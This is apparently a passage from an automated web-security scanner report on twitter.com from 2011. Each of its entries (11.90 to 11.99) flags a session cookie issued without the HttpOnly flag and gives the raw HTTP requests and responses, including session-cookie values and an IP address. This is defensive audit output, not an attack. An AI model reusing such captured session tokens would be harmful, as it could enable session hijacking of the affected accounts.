Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225046-53952-21746
ETag: "2ad3827a054ebfaafa3ae7d33a059d42"
Last-Modified: Fri, 28 Jan 2011 14:30:46 GMT
X-Runtime: 0.01106
Content-Type: text/html; charset=utf-8
Content-Length: 53247
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.90. http://twitter.com/deionbranch84

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /deionbranch84

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /deionbranch84 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265287-45791-20728
ETag: "cf921750730cd97318f25ed57b09cad3"
Last-Modified: Sat, 29 Jan 2011 01:41:27 GMT
X-Runtime: 0.01145
Content-Type: text/html; charset=utf-8
Content-Length: 50211
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.91. http://twitter.com/dougneiner

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /dougneiner

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dougneiner HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:13 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225073-41249-57241
ETag: "a0613392b43e537b2e040e0724b95bf7"
Last-Modified: Fri, 28 Jan 2011 14:31:13 GMT
X-Runtime: 0.01266
Content-Type: text/html; charset=utf-8
Content-Length: 53641
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.92. http://twitter.com/ebello

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /ebello

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ebello HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225040-69634-53816
ETag: "ec4d064b3111971c1cbbd076806b6c98"
Last-Modified: Fri, 28 Jan 2011 14:30:40 GMT
X-Runtime: 0.01003
Content-Type: text/html; charset=utf-8
Content-Length: 54961
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.93. http://twitter.com/ericmmartin

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /ericmmartin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ericmmartin HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224922-26410-25724
ETag: "b52f4470d0eb7102204e56e131ce2f8f"
Last-Modified: Fri, 28 Jan 2011 14:28:42 GMT
X-Runtime: 0.50069
Content-Type: text/html; charset=utf-8
Content-Length: 58034
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiNodHRwOi8vdHdpdHRlci5jb20vZXJpY21tYXJ0%250AaW46DGNzcmZfaWQiJTgyOTI5MWZkOGU2YmQxN2QxYTRkYzlmMDFlZjViZDVk%250AOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNo%250ASUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1%250Ac2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE%253D--aec68d2fd0935035e3877d8879d09c5b64c00398; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.94. http://twitter.com/ericmmartin/status/30128016856195073

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /ericmmartin/status/30128016856195073

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ericmmartin/status/30128016856195073 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224926-9669-3756
ETag: "8a207398e91696a15179ff55977c38f1"
Last-Modified: Fri, 28 Jan 2011 14:28:46 GMT
X-Runtime: 0.04848
Content-Type: text/html; charset=utf-8
Content-Length: 13726
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20vZXJpY21tYXJ0%250AaW4vc3RhdHVzLzMwMTI4MDE2ODU2MTk1MDczOgxjc3JmX2lkIiVmMzE1MDNl%250AMzcxMDU0OWE3YjU2YTE5Zjk1OGRkMDBmMToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI%250AM07wzC0B--f20b609817e7de3826da0bcc06ca803fab8dec0f; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.95. http://twitter.com/favorites/14594657.rss

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /favorites/14594657.rss

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favorites/14594657.rss HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:37 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224737-3926-21803
X-RateLimit-Limit: 150
ETag: "708dea7c27c89c56a852101cec365315"
Last-Modified: Fri, 28 Jan 2011 14:25:37 GMT
X-RateLimit-Remaining: 144
X-Runtime: 0.06567
X-Transaction-Mask: 0b5b266a28469a7b52ded76c9a66f018
Content-Type: application/rss+xml; charset=utf-8
Content-Length: 13545
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1296227305
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:georss="http://www.georss.org/georss" xmlns:twitter="http://api.twitter.com">
<channel>
<
...[SNIP]...

11.96. http://twitter.com/favorites/toptweets.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /favorites/toptweets.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favorites/toptweets.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1296232504372=cachebust HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129452629042599503; original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; tz_offset_sec=-21600; __utmz=43838368.1296223511.1.1.utmcsr=malsup.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1078689092.1296223511.1296223511.1296223511.1; __utmc=43838368; __utmv=43838368.lang%3A%20en; k=173.193.214.243.1296227675375304; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:35:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296232518-14489-49043
X-RateLimit-Limit: 150
ETag: "a73f7cf89a5f9d35a2a745da5eeb4d24"-gzip
Last-Modified: Fri, 28 Jan 2011 16:35:18 GMT
X-RateLimit-Remaining: 150
X-Runtime: 0.07886
X-Transaction-Mask: 0b5b266a28469a7b52ded76c9a66f018
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1296236118
Set-Cookie: _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; domain=.twitter.com; path=/
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 33965

TWTR.Widget.receiveCallback_1([{"favorited":false,"text":"Check out Smackdown tonight. Edge and I team up for the first time in 4 yrs to give a much deserved beating to Miz and Ziggler","place":null,"
...[SNIP]...

11.97. http://twitter.com/gercheq

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /gercheq

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gercheq HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225077-54075-30524
ETag: "4793986d74da0ff9abc545ba99de39af"
Last-Modified: Fri, 28 Jan 2011 14:31:17 GMT
X-Runtime: 0.27545
Content-Type: text/html; charset=utf-8
Content-Length: 51283
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.98. http://twitter.com/greenRAYn20

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /greenRAYn20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /greenRAYn20 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:56 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266036-99102-50087
ETag: "633d1248acbb92f412629e8aa3e8a93b"
Last-Modified: Sat, 29 Jan 2011 01:53:56 GMT
X-Runtime: 0.01198
Content-Type: text/html; charset=utf-8
Content-Length: 9230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

11.99. http://twitter.com/harvardlampoon

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /harvardlampoon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /harvardlampoon HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265997-31045-3388
ETag: "dd05aa33a38e41399f97d64b699efc32"
Last-Modified: Sat, 29 Jan 2011 01:53:17 GMT
X-Runtime: 0.01350
Content-Type: text/html; charset=utf-8
Content-Length: 19877
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
